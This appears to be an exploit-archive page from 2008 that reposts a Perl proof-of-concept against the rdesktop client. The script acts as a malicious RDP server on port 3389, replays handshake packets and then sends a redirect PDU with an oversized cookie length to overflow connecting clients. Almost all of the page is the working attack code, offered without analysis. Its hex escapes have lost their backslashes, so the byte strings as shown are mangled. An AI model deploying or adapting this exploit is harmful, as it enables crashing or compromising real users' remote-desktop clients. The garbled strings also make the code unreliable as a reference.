Home / os / win10

rdesktoppdu-overflow.txt

Posted on 13 May 2008

#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697

use strict;
use IO::Socket;

my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);

my $evil = 	"x03x00x01x47x02xf0x80x68x00x01x03xebx70x81x38" 	.
"x01x00x10x00"						.
"xc5x32"							.
"x04x75"							. # PDU TYPE == 0x4 == PDU_REDIRECT
"xb7xdaxf8x43"						.
"x01x00x00x00"						.
"x01x00x00x00"						.
"xffxffxffxff"						. # len of g_redirect_cookie
"x41" x 64							; # g_redirect_cookie

while(my $c = $sock->accept())
{
while(<$c>)
{
print $c ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(), $evil;
}
}




sub ONE()
{
"x03x00x00x0bx06xd0x00x00x12x34x00"
}

sub TWO()
{
"x03x00x01x49x02xf0x80x7fx66x82x01".
"x3dx0ax01x00x02x01x00x30x1ax02x01".
"x22x02x01x03x02x01x00x02x01x01x02".
"x01x00x02x01x01x02x03x00xffxf8x02".
"x01x02x04x82x01x17x00x05x00x14x7c".
"x00x01x2ax14x76x0ax01x01x00x01xc0".
"x00x4dx63x44x6ex81x00x01x0cx08x00".
"x04x00x08x00x03x0cx0cx00xebx03x01".
"x00xecx03x00x00x02x0cxecx00x02x00".
"x00x00x02x00x00x00x20x00x00x00xb8".
"x00x00x00x29x60xbbx2fxc4x4dx00x9e".
"x58x8axb4x85x35x6ax71xeaxadxf9x3d".
"x0ex5ex8ex87x64x2dx52x42xedxb2x91".
"x3fxf9x01x00x00x00x01x00x00x00x01".
"x00x00x00x06x00x5cx00x52x53x41x31".
"x48x00x00x00x00x02x00x00x3fx00x00".
"x00x01x00x01x00xf9xa3x35xb2x78x63".
"x8dx94x65x47x22x54x49x55xaex6fx74".
"x69x73x6exeex2bxa5xd0x47xf6xc0x89".
"x2exa0x54xf5x12x87x75xb5x89xf7x83".
"x48xd9x54xebxdex20x73xd6xd8xf3xee".
"x0fxf7xc2xaaxa4x79x0ax5ax64x92x53".
"xc4x75xd4x00x00x00x00x00x00x00x00".
"x08x00x48x00xf6x20x04x62x5bx2fx04".
"xaex02x04x4ax7excfx59x02x11xf7x7f".
"xabx74x95xcex01x4exf6x14x50x0bxd7".
"x54x8fxf0x92xd5x0cx6fx42xd8x21x98".
"x9fx87x50x9ax33x6cxefx65x05x5cx4a".
"x93x51xc1x69x59x7cx3dxf4x63xdcx53".
"x66x3bx00x00x00x00x00x00x00x00"
}

sub THREE()
{
"x03x00x00x0bx02xf0x80x2ex00x00x04"
}

sub FOUR()
{
"x03x00x00x0fx02xf0x80x3ex00x00x04x03xedx03xed"
}

sub FIVE()
{
"x03x00x00x0fx02xf0x80x3ex00x00x04x03xebx03xeb"
}

sub SIX()
{
"x03x00x00x0fx02xf0x80x3ex00x00x04x03xecx03xec"
}

sub SEVEN()
{
"x03x00x00x22x02xf0x80x68x00x01x03xebx70x14x80x02x10x00xffx03x10x00x07x00x00x00x02x00x00x00x30x9ax00x00"
}

 

TOP

Malware :

Exploits :